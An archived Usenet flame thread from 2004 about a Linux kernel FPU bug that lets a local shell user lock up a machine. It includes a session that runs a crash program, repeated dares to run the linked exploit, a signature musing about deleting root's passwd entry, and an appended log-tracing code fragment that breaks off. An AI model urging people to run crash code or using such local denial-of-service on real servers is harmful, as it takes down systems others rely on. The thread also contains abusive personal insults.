SirCam - Innovative Microsoft peer-to-peer software.
| |
| Kelsey Bjarnason 2004-06-26, 1:20 pm |
| [snips]
On Sun, 20 Jun 2004 05:56:47 -0700, T.G.Reaper wrote:
>
> Well then hell, if your system is already patched then there must not be
> any problem. Who the XXXX cares about the thousands, if not millions of
> Linux systems worldwide that are vulnerable right now.
Probably nowhere near "millions", given how easy it is to update Linux
boxes.
> BTW, I've been told that Linux machines don't need to be rebooted just to
> do simple things like apply patches and updates.
Non-kernel patches, sure.
> Is that true in this case?
It's a _kernel_ patch, isn't it?
> You are aware that an unpatched Linux box could easily be killed by a
> normal user with nothing more than simple remote shell access aren't you?
"killed" is one thing. Security breaches are another.
> Now let's see, of all the Linux systems world wide, how many do you
> think have some type of remote access enabled?
Loads of 'em. Of those, how many is an arbitrary hacker going to have
shell access on? Of those, how many are going to be vulnerable to said
issue?
| |
| T.G.Reaper's IQ is 35 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
>
> At least I don't have to nymshift to avoid people's kill files.
BWAAAHAAAHAAAHAAHAAAA!!! You lying sack of shit.
Can't you even lie consistently, you obtuse snotXXXX?
You apparently PLONKed this nym four times already
since yesterday.
-------------------------------------------
Subject: Re: T.G.Reaper - lying sack of shit exposed
Message-ID: <pan.2e839456004.06.20.02.05.55.769547@127.0.0.1.Com>
Date: Sun, 20 Jun 2004 02:24:20 GMT
T.G.Reaper wrote:
> a cola poster made some disparaging comment about her
Ahem:
http://groups.google.com/groups?q=t....0.1.Com&rnum=1
--- quote ---
P.S. I have verifiable proof of a 131 IQ and my wife's is 136. Maybe it
was your own score you were thinking about.
--- end quote ---
http://groups.google.com/groups?q=t....0.1.Com&rnum=3
--- quote ---
> Your wife couldn't
> possibly have an IQ of 136 and still be with you unless she's your
> mental healthcare nurse nurturing your delusion to prevent you
> from descending further into mental illness"
My wife currently has breast cancer and I'd much prefer that you leave her
out of the discussion.
--- end quote ---
You brought her onto Usenet and no "disparaging comments" were ever made
about her, you obtuse, lying sack of shit. Your motive was clearly sympathy
to fend off the attacks on your poor intellect.
| |
|
| T.G.Reaper wrote:
> [SNIP]
That's nice, TG. But, guess what? Since I don't write code and have no
need for gcc, it's not installed on my system. That means
a) I can't compile your program, and
b) Since I can't compile it, I can't run it.
Now, next time you're going to have to make sure it's in an executable form
for those of us with no programming languages installed.
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
< snip TeeGee garbage >
> I don't see anything at all that indicates in anyway that user "Reaper"
> caused any type of problem at all. Where is this "proof" that the Admin
> would use to kick me off the payroll, or make me pay damages?
>
That *you* don't see anything means absolutely zilch.
And, BTW, do your own homework. *You* are the one claiming all sorts of
bullshit. So now you claim, in addition to your other stupidities, that you
are too stupid to find traces. Yup, I can believe that
--
Only two things are infinite,
the Universe and Stupidity.
And I'm not quite sure about the former.
- Albert Einstein
| |
| GreyCloud 2004-06-26, 1:20 pm |
|
T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:39:21 -0600, GreyCloud wrote:
>
>
>
>
>
> Okay, feel free to post the XP equivalent.
>
>
Someone already did. It had to do with printing the '\b' character
several times. A whole lot simpler than the other one you posted.
Programming code to deliberately crash an o/s and an application designed
to do real work crashing the o/s are two different colors of horse. I've
seen where OE had caused XP to mysteriously reboot a Toshiba laptop. I
haven't seen this happen on Linux/Solaris or OS X.
>
>
> Well, that kinda depends on what comes in and how doesn't it?
>
> For example, if an average user had shell access to a Linux box, say at
> his/her ISP, and logged in from the Net. It would be quite trivial for
> that user to manage to execute this little app. That's going to kill the
> Linux box dead.
Maybe, maybe not. But I'm not talking about this not so normal
situation. I'm talking about surfing the net and reading your email on
your home computer.
| |
| GreyCloud 2004-06-26, 1:20 pm |
|
T.G.Reaper wrote:
> On Sun, 20 Jun 2004 11:53:17 +0100, William Poaster wrote:
>
>
>
>
>
> Okay, same offer, since Linux is so XXXXing bullet proof, suppose you give
> me a shell account, as just a regular user on any Linux system you have
> which currently has a week or more of uptime?
>
Actually, an offer like this exists now at DEFCON 12 being held in Las
Vegas, NV. on July 31, 2004 to Aug. 1, 2004. A Linux box will be there
for various hackers to hack. They didn't even want an Alpha box with
OpenVMS on it as they know that the hackers won't get in and it's no fun.
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 08:51:41 -0700, Kelsey Bjarnason wrote:
> On Sun, 20 Jun 2004 06:05:21 -0700, T.G.Reaper wrote:
>
> Nah,
That's what I figured the answer would be.
> You see, if you can't do that, then all that's required to render a Linux
> box absolutely secure against remote exploits is to disable remote logins,
Problem is, this is a local exploit as well, it's just that remote shells
make it possible to execute local code from remote locations. So even with
remote logins disabled any box that has more than one or two active user
accounts, still has it's XXX hanging out in the wind doesn't it?
> which would be a very bad blow for Windows in any comparison of security.
LOL, having to turn off a service in Linux because there's a big
XXXXing hole in it makes Windows security look bad, that's a good one.
> While we're at it, let's also try it the other way: you open up your
> Windows box to remote logins, give us the account information and we'll
> see which box survives the longer: the Linux box with remote logins, or
> the Windows box with remote logins.
I thought you said "Nah" to the request for a shell account?
You also might have a little difficulty connecting to Windows Terminal
Server if I were to enable it.
> Oh, but wait... your little exploit
> just locks up the box, it doesn't, say, give the user admin privileges
> which they can use to access private information, etc, right? So there's
> no "0wn3d" involved here at all, really - just frozen.
That's right, maybe that's why they call it a Denial of Service attack.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Buford 2004-06-26, 1:20 pm |
| On Sat, 19 Jun 2004 20:43:25 -0700, T.G.Reaper wrote:
> On Sat, 19 Jun 2004 22:10:11 -0500, Buford wrote:
>
>
>
> Here sport, compile and run this
LOL. I think you're missing what's so funny about it. Just like last
time.
Anyway, here's my answer to your request that I copy&paste, save, compile,
and run your virus: No.
There. See? Your virus/worm/crashware doesn't work on my box.
I'm betting you still don't get it, though. 
--
Buford
.o. "I'm doing a free operating system (just a hobby, won't be
..o big and professional like gnu)..."
ooo - Linus Torvalds, 1991
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 10:54:42 -0500, Sinister Midget wrote:
> On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
>
> You mean so I can _delegate_ steps a-d? It _still_ requires me to
> cooperate or you don't get to do it.
> It's not just about being "easy", it's about being "just as easy",
> which is the claim made over and over and over wrt how linux is going
> to be just as in-trouble as Windoze.
Problem is, if you're an ISP or a medium sized company with a few unhappy
employees, one of the "bad guys" may in fact be one of your regular users,
who already HAS a shell account. Anything that lets a regular user crash a
system is REALLY REALLY BAD.
I ran the FPU exploit code on my humble little Gentoo box three times, the
last time Pan lost ALL of my subscribed groups, What might get lost if a
disgruntled employee executes it on the server that houses the company
payroll? or some server that contains customer/client/shipping information?
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 09:02:04 -0700, Kelsey Bjarnason wrote:
> On Sun, 20 Jun 2004 05:56:47 -0700, T.G.Reaper wrote:
>
>
> Probably nowhere near "millions", given how easy it is to update Linux
> boxes.
Not in this case. On Gentoo at least, emerge -u system doesn't do a damned
thing to prevent this FPU bug from locking a system hard.
>
> Non-kernel patches, sure.
Well that doesn't cover this particular vulnerability now, does it?
>
> It's a _kernel_ patch, isn't it?
Oh please, go at least do a little research before you post about
something you don't even know the basic facts about.
>
> "killed" is one thing. Security breaches are another.
That's one of the silliest statements I've read in a long time. What
school teaches that brilliant axiom?
Hint: Denial of service.
>
> Loads of 'em. Of those, how many is an arbitrary hacker going to have
> shell access on?
All it would take is one unhappy user with an axe to grind.
> Of those, how many are going to be vulnerable to said
> issue?
Every single one that hasn't actually been patched.
As of this moment, the various Linux update tools like YOU, emerge,
apt-get, etc, do NOT protect against this vulnerability. That may change,
in the future, but in the mean time, the majority of Linux boxes on the
planet will gladly bend over and spread their cheeks for any user with a
shell account.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 16:06:00 +0000, John wrote:
> T.G.Reaper wrote:
> That's nice, TG. But, guess what? Since I don't write code and have no
> need for gcc, it's not installed on my system. That means
> a) I can't compile your program, and
> b) Since I can't compile it, I can't run it.
>
> Now, next time you're going to have to make sure it's in an executable form
> for those of us with no programming languages installed.
I don't care whether you run it or not. If you did, I already know what
the result would be.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:20 pm |
| On Sun, 20 Jun 2004 18:41:38 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> < snip TeeGee garbage >
>
>
> That *you* don't see anything means absolutely zilch.
was there to be seen.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 10:54:42 -0500, Sinister Midget wrote:
>
>
>
>
> Problem is, if you're an ISP or a medium sized company with a few unhappy
> employees, one of the "bad guys" may in fact be one of your regular users,
> who already HAS a shell account.
That "bad guy" would rather fast see some pretty nasty post from a lawyer
> Anything that lets a regular user crash a system is REALLY REALLY BAD.
>
Granted. Still it is just a local DOS exploit. A patched one, to boot
> I ran the FPU exploit code on my humble little Gentoo box three times, the
> last time Pan lost ALL of my subscribed groups, What might get lost if a
> disgruntled employee executes it on the server that houses the company
> payroll? or some server that contains customer/client/shipping
> information?
>
You're wriggling like mad just to keep your argument. Although it is totally
stupid.
--
Microsoft's Guide To System Design:
Form follows malfunction.
| |
| Peter Köhlmann 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 18:41:38 +0200, Peter Köhlmann wrote:
>
> was there to be seen.
>
Again off your meds, Idiot?
Still no idea how to hunt down that "bad user"? Still completely clueless?
--
<html><input type crash></html>
Just out of curiosity does this actually mean something or have some
of the few remaining bits of your brain just evaporated?
| |
| John A. Bailo 2004-06-26, 1:20 pm |
| T.G.Reaper wrote:
>
> [ 16:45:32] Linux Kernel Crash $ ls -ls
> total 40
> 20 -rw------- 1 Reaper users 16900 Jun 16 16:56
> 2004-06-11_kernel_crash.t2t.tar.bz2
> 8 -rwxr-xr-x 1 Reaper users 7242 Jun 19 15:31 EvilKernel.Exe
> 4 -rw-r--r-- 1 Reaper users 1471 Jun 16 17:01 Evil_krnl-1.c
> 4 -rw-r--r-- 1 Reaper users 1168 Jun 19 15:25 Evil_krnl-1.o
> 4 -rw-r--r-- 1 Reaper users 529 Jun 16 17:03 Original_Evil_Crash.c
> [ 16:45:35] Linux Kernel Crash $
> [ 16:45:52] Linux Kernel Crash $ su root
> Password:
> [ 16:46:14] Linux Kernel Crash $ whoami
> root
> [ 16:46:23] Linux Kernel Crash $ uname -a
> Linux SniFF 2.6.5-Gentoo #2 Tue Apr 20 03:09:39 PDT 2004 i686 Pentium III
> (Coppermine) GenuineIntel GNU/Linux
> [ 16:46:35] Linux Kernel Crash $
> [ 16:46:38] Linux Kernel Crash $ emerge -u system
> Calculating system dependencies ...done!
>
>
> * GNU info directory index is up-to-date.
>
> [ 16:46:57] Linux Kernel Crash $ exit
> exit
> [ 16:47:27] Linux Kernel Crash $ whoami
> Reaper
> [ 16:47:34] Linux Kernel Crash $ ./EvilKernel.Exe
>
> __________________________________
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happen the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
>
>
The system admin can limit the Load Average for the user.
That would squelch your *exploit* very fast.
--
w:4
| |
| Kelsey Bjarnason 2004-06-26, 1:20 pm |
| [snips]
> Not in this case. On Gentoo at least, emerge -u system doesn't do a damned
> thing to prevent this FPU bug from locking a system hard.
1) That's Gentoo
2) That's easily worked around by snarfing a kernel - or patch -
elsewhere.
> Well that doesn't cover this particular vulnerability now does it.
>
>
> Oh please, go at least do a little research before you post about
> something you don't even know the basic facts about.
The flaw is in the kernel's handling of an FP issue, no? Hence, the patch
would be a kernel patch, no? Hence it would require a reboot, no?
>
> That's one of the silliest statements I've read in a long time. What
> school teaches that brilliant axiom?
>
> Hint: Denial of service.
DOS is not a security breach. With a few zombies to play with, you could
DOS ebay right off the net. Exactly how many customers' credit card
numbers does this buy you? Zero. Because you haven't breached security
at all.
>
> All it would take is one unhappy user with an axe to grind.
And who doesn't mind facing charges, given that it requires a remote
logon, hence, a user account.
>
> Every single one that hasn't actually been patched.
Which is how many?
> As of this moment, the various Linux update tools like YOU, emerge
> apt-get, etc, do NOT protect against this vulnerability. That may
> change, in the future, but in the mean time, the majority of Linux boxes
> on the planet will gladly bend over and spread their cheeks for any user
> with a shell account.
Which is how many?
| |
| Norwegian Formula 2004-06-26, 1:20 pm |
| T.G.Reaper, after spending 3 minutes figuring out which end of the pen to use,
wrote:
> On Sun, 20 Jun 2004 16:06:00 +0000, John wrote:
>
>
>
> I don't care whether you run it or not. If you did, I already know what
> the result would be.
>
BWAAAAAAHAHAHAHAHAHAHA! What were you doing when you thought that...running
around the room trying to catch the one amoeba that leaked out of your ear that
you call a brain? XXXXing athletes foot fungus makes fun of you.
--
Linux 2.4.20-4GB-athlon
4:32pm up 9 days 19:56, 2 users, load average: 0.00, 0.04, 0.00
| |
| Sinister Midget 2004-06-26, 1:20 pm |
| On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Sun, 20 Jun 2004 09:02:04 -0700, Kelsey Bjarnason wrote:
>
>
>
> Not in this case. On Gentoo at least, emerge -u system doesn't do a damned
> thing to prevent this FPU bug from locking a system hard.
>
>
> Well that doesn't cover this particular vulnerability now does it.
>
>
> Oh please, go at least do a little research before you post about
> something you don't even know the basic facts about.
>
>
> That's one of the silliest statements I've read in a long time. What
> school teaches that brilliant axiom?
>
> Hint: Denial of service.
>
>
> All it would take is one unhappy user with an axe to grind.
>
>
> Every single one that hasn't actually been patched.
>
> As of this moment, the various Linux update tools like YOU, emerge
> apt-get, etc, do NOT protect against this vulnerability. That may change,
> in the future, but in the mean time, the majority of Linux boxes on the
> planet will gladly bend over and spread their cheeks for any user with a
> shell account.
It still requires that every machine have a user with a shell account
that would then have a reason to run this program, or could be tricked
into running it. And it still requires that the given machine be
unpatched. That's going to be less than 1% of the machines that meet
all of the conditions needed. Far less.
Most problems with WinDross require no user with an axe to grind and
nobody getting tricked into running the errant binary, no shell access,
no assistance in exploiting things by compiling and making executable,
no nothing. Just view the header in an email and you are 'sploited. Or
browse a page and start infecting your friends & neighbors for fun &
profit. Click on a link in a page and start getting your machine
hijacked.
--
Linux: Because you can!
| |
| William Poaster 2004-06-26, 1:20 pm |
| begin On Sun, 20 Jun 2004 11:24:38 -0600, GreyCloud posted:
>
>
> T.G.Reaper wrote:
>
> Actually, an offer like this exists now at DEFCON 12 being held in Las
> Vegas, NV. on July 31, 2004 to Aug. 1, 2004. A Linux box will be there
> for various hackers to hack. They didn't even want an Alpha box with
> OpenVMS on it as they know that the hackers won't get in and is no fun.
Actually I dropped The Grim Reaper in the bin weeks ago. I just got fed up
with reading his crap.
--
Installing Linux is easy, just watch
http://www.theinquirer.net/?article=6276
| |
|
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 16:06:00 +0000, John wrote:
>
>
>
> I don't care whether you run it or not. If you did, I already know what
> the result would be.
>
Of course you do: It wouldn't work since I patched that exploit a few days
ago.
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 20:50:54 +0000, John A. Bailo wrote:
> The system admin can limit the Load Average for the user.
>
> That would squelch your *exploit* very fast.
God you're a XXXXing moron.
http://www.suse.co.uk/de/security/2004_17_kernel.html
Quote:
"There is no workaround known."
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 22:53:26 +0200, Peter Köhlmann wrote:
> T.G.Reaper wrote:
>
>
> That "bad guy" would rather fast see some pretty nasty post from a lawyer
That hasn't stopped people from defacing Apache servers running on
Linux, why would it stop this?
It doesn't stop people from committing robbery or murder, I see no reason
to believe it would somehow magically take effect in this context.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| GreyCloud 2004-06-26, 1:21 pm |
|
William Poaster wrote:
> begin On Sun, 20 Jun 2004 11:24:38 -0600, GreyCloud posted:
>
>
>
>
> Actually I dropped The Grim Reaper in the bin weeks ago. I just got fedup
> with reading his crap.
>
Somehow I see his posts in comp.os.vms. I don't read them and the posts
seemed to be mixed up with some other flame war going on with Nomen Nescio
or somebody like that.
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 14:04:03 -0700, Kelsey Bjarnason wrote:
> [snips]
>
>
> 1) That's Gentoo
> 2) That's easily worked around by snarfing a kernel - or patch -
> elsewhere.
I didn't say patches didn't exist, they do. I'm just saying that doing an
automatic on-line update does not get you patched against this
particular bug.
>
> DOS is not security breach. With a few zombies to play with, you could
> DOS ebay right off the net.
This is not the same as one person controlling several hundred machines,
and just chewing up all your bandwidth. That indeed is not a security
breach. This is one person, a regular user, having the power to kill a
server dead, and the OS letting it happen. Sorry, I don't care how you
phrase it, or dress it up, that most certainly IS a security breach.
http://www.suse.co.uk/de/security/2004_17_kernel.html
Subject: [suse-security-announce] SUSE Security Announcement: kernel
(SuSE-SA:2004:017)
http://fedoranews.org/updates/FEDORA-2004-171.shtml
[SECURITY] Fedora Core 2 Update: kernel-2.6.6-1.435
http://lists.trustix.org/pipermail/...une/000247.html
Trustix Security Advisor tsl@xxxxxxxxxxx
________________________________________
___________________
For a bug that isn't really a security breach as you contend, there sure
are an awful lot of security announcements regarding it.
> Exactly how many customer's credit card
> numbers does this buy you? Zero. Because you haven't breached security
> at all.
Another stupid statement.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Sun, 20 Jun 2004 22:01:46 +0000, Sinister Midget wrote:
> On 2004-06-20, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
>
> It still requires that every machine have a user with a shell account
> that would then have a reason to run this program, or could be tricked
> into running it. And it still requires that the given machine be
> unpatched. That's going to be less than 1% of the machines that meet
> all of the conditions needed. Far less.
Christ, I'm not saying that it's going to destroy the Net, or implode the
universe, there isn't any one single person with access to enough Linux
boxes to do any widespread damage. That doesn't change the fact that it's
a very serious bug. Hell I had one Linux nut try to tell me that the
vulnerability wasn't actually a security breach. I'm just saying that
whether or not it causes widespread damage and destruction, it's still
very serious for an OS to allow a regular user to render it inoperable.
> Most problems with WinDross require no user with an axe to grind and
> nobody getting tricked into running the errant binary, no shell access,
> no assistance in exploiting things by compiling and making executable,
> no nothing. Just view the header in an email and you are 'sploited. Or
> browse a page and start infecting your friends & neighbors for fun &
> profit. Click on a link in a page and start getting your machine
> hijacked.
That's just a collection of exaggerated half truths, combined with a few
meaningless generalities that you couldn't support with cold hard facts
and references if your life depended on it. I've several Windows systems
right here in front of me that are used on a daily basis, all of them are
clean and stable and have been for years.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| T.G.Reaper 2004-06-26, 1:21 pm |
| On Mon, 21 Jun 2004 00:44:03 +0000, John wrote:
> T.G.Reaper wrote:
>
>
> Of course you do: It wouldn't work since I patched that exploit a few days
> ago.
Then compile and run it, you surely are invulnerable, what harm could it
do, or are you not sure?
Since you're all patched up to date, then you should be invulnerable
to the FPU exploit code, right? I say you're not.
The only way to find out for sure is to compile and run the code. You can
get it from here:
http://linuxreviews.org/news/2004-0...rash/index.html
If you're not willing to run a simple little test, then your pronouncements
of how you're all secure and invulnerable because of Linux's great bug
fixing and package management will ring a little hollow.
I'm not posting any binaries, I'm not asking for help in "OwNinG"
anybody's system. I'm just saying if you aren't willing to test what you
say is actually true, I don't particularly want to hear all your hot air
about how great this or some other attribute of the OSS patch/update
system is.
--
[11:33:10] Reaper $ su NormalUser
Password:
[11:33:10] Reaper $ whoami
root
[11:33:10] Reaper $
****************************************
**********************
no entry in .passwd or .groups file for NormalUser locally.
Now I wonder what happens if I delete that entry for root
from the .passwd file...?
\etc\ #: Cheers - T.G. Reaper
** If anybody knows for sure, give me your opinion ***********
| |
| Peter Köhlmann 2004-06-26, 1:21 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 22:53:26 +0200, Peter Köhlmann wrote:
>
>
>
> That hasn't stopped people from defacing Apache servers running on
> Linux, why would it stop this.
>
Not the same thing. If the user has an account, he is hardly some unknown
fool. His actions can be traced back to him quite easily
> It doesn't stop people from committing robbery or murder, I see no reason
> to believe it would somehow magically take effect in this context.
>
Well, if you rob a bank and leave your address, it would be roughly the same
thing.
You can twist it as much as you like, the fact remains: The bad guy has to
have a shell account. He is not unknown. His actions can be traced back.
In other words, he would have to be as stupid as TG Reaper to do such a
stunt.
--
"Windows was created to keep stupid people away from UNIX."
-- Tom Christiansen
| |
| Peter Köhlmann 2004-06-26, 1:21 pm |
| T.G.Reaper wrote:
> On Sun, 20 Jun 2004 14:04:03 -0700, Kelsey Bjarnason wrote:
>
>
> I didn't say patches didn't exist, they do. I'm just saying the doing an
> automatic on-line update does not get you patched against this
> particular bug.
>
Idiot
--
"Last I checked, it wasn't the power cord for the Clue Generator that
was sticking up your XXX." - John Novak, rasfwrj
| |
| Sinister Midget 2004-06-26, 1:21 pm |
| On 2004-06-21, T.G.Reaper <Reaper@127.0.0.1.Com> sputtered:
> On Sun, 20 Jun 2004 22:01:46 +0000, Sinister Midget wrote:
>
>
>
> Christ, I'm not saying that it's going to destry the Net, or implode the
> universe, there isn't any one single person with access to enough Linux
> boxes to do any widespread damage. That doesn't change the fact that it's
> a very serious bug. Hell I had one Linux nut try to tell ne that the
> vulnerability wasn't actually a security breach. I'm just saying that
> whether or not it causes widespread damage and destruction, it's still a
> very serous for an OS to allow a regular user to render it inoperable.
>
>
> That's just a collection of exaggerated half truths, combined with a few
> meaningless generalities that you couldn't support with cold hard facts
> and references if your life depended on it. I've several Windows systems
> right here in front of me that are used on a daily basis, all of them are
> clean and stable and have been for years.
http://www.computerworld.com.au/ind...316298&eid=-255
http://news.zdnet.co.uk/internet/se...39149406,00.htm
http://www.esecurityplanet.com/aler...cle.php/3345351
http://www.pchell.com/internet/kakworm.shtml
http://www.microsoft.com/security/incident/swen.mspx
http://www.microsoft.com/technet/se...n/MS01-020.mspx
http://www.wired.com/news/infostruc...7,63391,00.html
http://cc.uoregon.edu/cnews/winter2000/bubbleboy.html
http://cert.surfnet.nl/i/2004/I-04-06.htm
http://forums.winforums.org/showthread.php?t=5294
http://www.microsoft.com/security/incident/sasser.mspx
http://www.microsoft.com/security/incident/mydoom.mspx
http://www.infos-du-net.com/en/news...aires-3000.html
http://www.securityfocus.com/archive/1/264590
http://securityresponse.symantec.co...32.korgo.l.html
http://www.utexas.edu/its/alerts/sobig.html
http://www.microsoft.com/technet/se...n/ms04-011.mspx
That's enough. There are enough that this could go on for years and
years.
Yeah, some of those aren't so new. But I wanted to illustrate the
problems aren't new either.
So, which ones are "exaggerated half truths" and/or "meaningless
generalities"? Are you going to claim to know more about WinDOS than
MICROS~1? They have some (dis)honorable mentions there, too.
--
You look through tinted Windows and only see the closed Gates beyond them.
| |
| Jim Richardson 2004-06-26, 1:21 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Sun, 20 Jun 2004 12:42:27 -0700,
T.G.Reaper <Reaper@127.0.0.1.Com> wrote:
> On Sun, 20 Jun 2004 18:41:38 +0200, Peter Köhlmann wrote:
>
> was there to be seen.
>
nah, you just don't know how to read logs. Or what logs to read.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1pkYd90bcYOAWPYRAiFyAKCmQ8+4yNg7
MTa8eu2QdaYWj3Y1tgCeOu30
4hYSwsVo7lRZLrRY+ETk3qc=
=ZWcX
-----END PGP SIGNATURE-----
--
Jim Richardson http://www.eskimo.com/~warlock
Money is truthful. If a man speaks of his honor, make him pay cash
-- Lazarus Long
| |
| William Poaster 2004-06-26, 1:21 pm |
| begin On Mon, 21 Jun 2004 09:38:21 +0200, Peter Köhlmann posted:
> T.G.Reaper wrote:
>
WTF? Jeez is this guy clueless.
> Idiot
Seconded.
--
Installing Linux is easy, just watch
http://www.theinquirer.net/?article=6276
| |
| Peter Jensen 2004-06-26, 1:21 pm |
| -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
T.G.Reaper wrote:
> I don't see anything at all that indicates in anyway that user
> "Reaper" caused any type of problem at all. Where is this "proof" that
> the Admin would use to kick me off the payroll, or make me pay
> damages?
I'm guessing he'd examine the WTMP logs to find out who was logged in at
the time of crash. If it's a remote login, auth.log will also hold the
username and IP address. Then he'd go over that users files and find
the nasty in some directory he has write access to. Having the nasty
executable owned by you is pretty hard evidence. Enough to get you
kicked off the machine, at least. There is simply no way to hide the
evidence, once you kill the machine.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)
iD8DBQFA1qukd1ZThqotgfgRAlCcAJ9F3gO+7vbu
saqZ0iMYxDazPVcDQwCfeAlW
rwcEIYKsuYyO5adg5uJBGsM=
=8O4l
-----END PGP SIGNATURE-----
--
PeKaJe
You're being followed. Cut out the hanky-panky for a few days.
| |
| TuxTrax 2004-06-26, 1:21 pm |
| "T.G.Reaper" <Reaper@127.0.0.1.Com> wrote in message news:<pan.2004.06.20.00.44.56.867246@127.0.0.1.Com>...
snip crash info
> __________________________________
>
> Guess what happens if I actually hit return and execute that little
> program. I'll tell you what happen the entire machine LOCKS UP HARD, no
> mouse, no keyboard, N.O.T.H.I.N.G, no mouse, no keyboard, no cli, zip,
> zilch, nothing at all is usable.
While certainly interesting in the abstract, what exactly is your
point? Like any decent Linux vulnerability, keyboard or shell access
is required. Any system that doesn't have remote log in locked down,
and shadow passwords enabled is asking for a good thrashing and it
doesn't require a kernel exploit to do it.
regards,
Mathew
| |
| Peter Köhlmann 2004-06-26, 1:21 pm |
| Peter Jensen wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> T.G.Reaper wrote:
>
>
> I'm guessing he'd examine the WTMP logs to find out who was logged in at
> the time of crash.
TeeGee certainly has never heard of "last" which does just that
If he had, he would have some vague idea how to start to hunt down that "bad
guy" he keeps blathering about.
< snip more explanations way over TeeGee's head >
--
Clippy: "It looks like you're trying to sue us,
would you like me to delete all of your files?"
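The hunt that Peter Jensen describes above (who was logged in when the box went down, per wtmp, and from where, per auth.log) and that Peter Köhlmann's "last" remark points at, written out as an added example. This is not code from either poster; it is a small Python reimplementation of what `last` does with the binary wtmp file, plus a pass over sshd "Accepted" lines. The wtmp records, user names, hosts, IPs and timestamps below are constructed for the example, and the crash time is assumed to come from the last syslog line written before the hang.

```python
import re
import struct

# Linux utmp/wtmp record layout as glibc writes it on i386 and x86_64 (384 bytes,
# little-endian; the time fields are 32-bit on both so the on-disk format matches):
#   short ut_type; (2 pad) pid_t ut_pid; char ut_line[32]; char ut_id[4]; char ut_user[32];
#   char ut_host[256]; short e_termination, e_exit; int32 ut_session;
#   int32 tv_sec, tv_usec; int32 ut_addr_v6[4]; char unused[20]
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
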